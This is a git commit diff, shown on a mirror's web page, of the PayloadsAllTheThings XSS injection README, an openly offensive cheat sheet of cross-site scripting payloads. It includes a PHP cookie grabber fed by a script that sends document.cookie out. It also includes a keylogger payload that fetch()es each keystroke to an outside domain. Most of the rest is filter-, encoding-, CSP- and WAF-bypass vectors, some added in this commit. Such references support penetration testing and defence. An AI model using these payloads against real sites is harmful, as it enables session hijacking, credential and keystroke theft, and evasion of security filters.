ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-18 17:28:49 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

XSS Colors highlighting + JS code eval

Browse Source
This commit is contained in:
Swissky 2018-06-27 20:00:17 +02:00
parent a7439d812d
commit 4a0fc27578
1 changed files with 105 additions and 61 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

166
XSS injection/README.md
View File

@ -8,11 +8,12 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
- [XSS in files](#xss-in-files)
- [Polyglot XSS](#polyglot-xss)
- [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)
- [Common WAF Bypas](#common-waf-bypass)
## Exploit code or POC
Cookie grabber for XSS
```
```php
<?php
// How to use it
# <script>document.location='http://localhost/XSS/grabber.php?c=' + document.cookie</script>
@ -27,7 +28,7 @@ fclose($fp);
```
Keylogger for XSS
```
```html
<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
```
@ -41,13 +42,13 @@ More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all]
## Identify an XSS endpoint
```
```javascript
<script>debugger;</script>
```
## XSS in HTML/Applications
XSS Basic
```
```javascript
Basic payload
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
@ -74,7 +75,7 @@ Svg payload
```
XSS for HTML5
```
```javascript
<body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
@ -89,14 +90,14 @@ XSS for HTML5
```
XSS using script tag (external payload)
```
```javascript
<script src=14.rs>
you can alsoo specify an arbitratry payload with 14.rs/#payload
e.g: 14.rs/#alert(document.domain)
```
XSS in META tag
```
```javascript
Base64 encoded
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
@ -107,24 +108,24 @@ With an additional URL
```
XSS in Hidden input
```
```javascript
<input type="hidden" accesskey="X" onclick="alert(1)">
Use CTRL+SHIFT+X to trigger the onclick event
```
DOM XSS
```
```javascript
#"><img src=/ onerror=alert(2)>
```
XSS in JS Context (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic)
```
```javascript
-(confirm)(document.domain)//
; alert(1);//
```
XSS URL
```
```javascript
URL/<svg onload=alert(1)>
URL/<script>alert('XSS');//
URL/<input autofocus onfocus=alert(1)>
@ -133,7 +134,7 @@ URL/<input autofocus onfocus=alert(1)>
## XSS in wrappers javascript and data URI
XSS with javascript:
```
```javascript
javascript:prompt(1)
%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
@ -151,7 +152,7 @@ java%09script:alert(1) - Horizontal tab (\t)
java%0dscript:alert(1) - CR (\r)
Using the escape character
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
Using the newline and a comment //
javascript://%0Aalert(1)
@ -159,19 +160,19 @@ javascript://anything%0D%0A%0D%0Awindow.alert(1)
```
XSS with data:
```
```javascript
data:text/html,<script>alert(0)</script>
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
```
XSS with vbscript: only IE
```
```javascript
vbscript:msgbox("XSS")
```
## XSS in files
** NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.
```
```xml
<name>
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
</name>
@ -179,7 +180,7 @@ vbscript:msgbox("XSS")
XSS in XML
```
```xml
<html>
<head></head>
<body>
@ -190,7 +191,7 @@ XSS in XML
XSS in SVG
```
```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
@ -203,7 +204,7 @@ XSS in SVG
```
XSS in SVG (short)
```
```javascript
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
@ -229,7 +230,7 @@ more payloads in ./files
XSS in SWF flash application
```
```javascript
flashmediaelement.swf?jsinitfunctio%gn=alert`1`
flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000
@ -250,7 +251,7 @@ phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domai
XSS in CSS
```
```html
<!DOCTYPE html>
<html>
<head>
@ -270,27 +271,27 @@ div {
## Polyglot XSS
Polyglot XSS - 0xsobky
```
```javascript
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
```
Polyglot XSS - Ashar Javed
```
```javascript
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
```
Polyglot XSS - Mathias Karlsson
```
```javascript
" onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
```
Polyglot XSS - Rsnake
```
```javascript
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
```
Polyglot XSS - Daniel Miessler
```
```javascript
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
@ -306,11 +307,11 @@ javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514)
![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg)
```
```javascript
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
```
![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large)
```
```javascript
<svg%0Ao%00nload=%09((pro\u006dpt))()//
```
@ -319,28 +320,40 @@ Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514)
## Filter Bypass and exotic payloads
Bypass case sensitive
```
```javascript
<sCrIpt>alert(1)</ScRipt>
```
Bypass tag blacklist
```
```javascript
<script x>
<script x>alert('XSS')<script y>
```
Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
Bypass word blacklist with code evaluation
```javascript
eval('ale'+'rt(0)');
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
```
Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
```javascript
<img src='1' onerror='alert(0)' <
```
Bypass quotes for string
```
```javascript
String.fromCharCode(88,83,83)
```
Bypass quotes in script tag
```
```javascript
http://localhost/bla.php?test=</script><script>alert(1)</script>
<html>
<script>
@ -350,46 +363,46 @@ http://localhost/bla.php?test=</script><script>alert(1)</script>
```
Bypass quotes in mousedown event
```
```javascript
<a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a>
You can bypass a single quote with &#39; in an on mousedown event handler
```
Bypass dot filter
```
```javascript
<script>window['alert'](document['domain'])<script>
```
Bypass parenthesis for string - Firefox
```
```javascript
alert`1`
```
Bypass onxxxx= blacklist
```
```javascript
<object onafterscriptexecute=confirm(0)>
<object onbeforescriptexecute=confirm(0)>
```
Bypass onxxx= filter with a null byte/vertical tab - IE/Safari
```
```javascript
<img src='1' onerror\x00=alert(0) />
<img src='1' onerror\x0b=alert(0) />
```
Bypass onxxx= filter with a '/' - IE/Firefox/Chrome/Safari
```
```javascript
<img src='1' onerror/=alert(0) />
```
Bypass space filter with "/" - IE/Firefox/Chrome/Safari
```
```javascript
<img/src='1'/onerror=alert(0)>
```
Bypass space filter with 0x0c/^L
```
```javascript
<svg onload = alert(1) >
@ -400,12 +413,12 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
Bypass document blacklist
```
```javascript
<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
```
Bypass using javascript inside a string
```
```javascript
<script>
foo="text </script><script>alert(1)</script>";
</script>
@ -413,7 +426,7 @@ foo="text </script><script>alert(1)</script>";
Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040)
```
```javascript
window['alert'](0)
parent['alert'](1)
self['alert'](2)
@ -430,8 +443,32 @@ content['alert'](6)
[12].forEach(alert);
```
Bypass using an alternate way to trigger an alert
Bypass using an alternate way to execute an alert - [@404death](https://twitter.com/404death/status/1011860096685502464)
```javascript
eval('ale'+'rt(0)');
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
constructor.constructor("aler"+"t(3)")();
[].filter.constructor('ale'+'rt(4)')();
top["al"+"ert"](5);
top[8680439..toString(30)](7);
top[/al/.source+/ert/.source](8);
top['al\x65rt'](9);
open('java'+'script:ale'+'rt(11)');
location='javascript:ale'+'rt(12)';
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
```
Bypass using an alternate way to trigger an alert
```javascript
var i = document.createElement("iframe");
i.onload = function(){
i.contentWindow.alert(1);
@ -452,12 +489,12 @@ XSSObject.proxy(window, 'alert', 'window.alert', false);
```
Bypass ">" using nothing #trololo (you don't need to close your tags)
```
```javascript
<svg onload=alert(1)//
```
Bypass ';' using another character
```
```javascript
'te' * alert('*') * 'xt';
'te' / alert('/') / 'xt';
'te' % alert('%') % 'xt';
@ -476,23 +513,23 @@ Bypass ';' using another character
```
Bypass using HTML encoding
```
```javascript
%26%2397;lert(1)
```
Bypass using Katakana (https://github.com/aemkei/katakana.js)
```
```javascript
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
```
Bypass using Octal encoding
```
```javascript
javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
```
Bypass using Unicode
```
```javascript
Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was
transformed into U+003C LESS­THAN SIGN (<)
@ -517,7 +554,7 @@ E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert
```
Bypass using Unicode converted to uppercase
```
```javascript
İ (%c4%b0).toLowerCase() => i
ı (%c4%b1).toUpperCase() => I
ſ (%c5%bf) .toUpperCase() => S
@ -528,7 +565,7 @@ Bypass using Unicode converted to uppercase
```
Bypass using overlong UTF-8
```
```javascript
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
@ -538,24 +575,24 @@ Bypass using overlong UTF-8
```
Bypass using UTF-7
```
```javascript
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
```
Bypass using UTF-16be
```
```javascript
%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00
\x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>
```
Bypass using UTF-32
```
```js
%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
```
Bypass using BOM - Byte Order Mark (The page must begin with the BOM character.)
BOM character allows you to override charset of the page
```
```js
BOM Character for UTF-16 Encoding:
Big Endian : 0xFE 0xFF
Little Endian : 0xFF 0xFE
@ -569,7 +606,7 @@ XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o
Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27))
//google.com/complete/search?client=chrome&jsonp=alert(1);
```
```js
<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
```
@ -583,7 +620,7 @@ Bypass using weird encoding or native interpretation to hide the payload (alert(
```
Exotic payloads
```
```javascript
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>
@ -597,13 +634,20 @@ Exotic payloads
<iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'>
```
## Incapsula WAF Bypass - 8th march
```
## Common WAF Bypass
### Incapsula WAF Bypass - 8th march
```javascript
anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
```
### Akamai WAF bypass by @zseano - 18th june
```javascript
?"></script><base%20c%3D=href%3Dhttps:\mysite>
```
## More fun ?
This section will be used for the "fun/interesting/useless" stuff.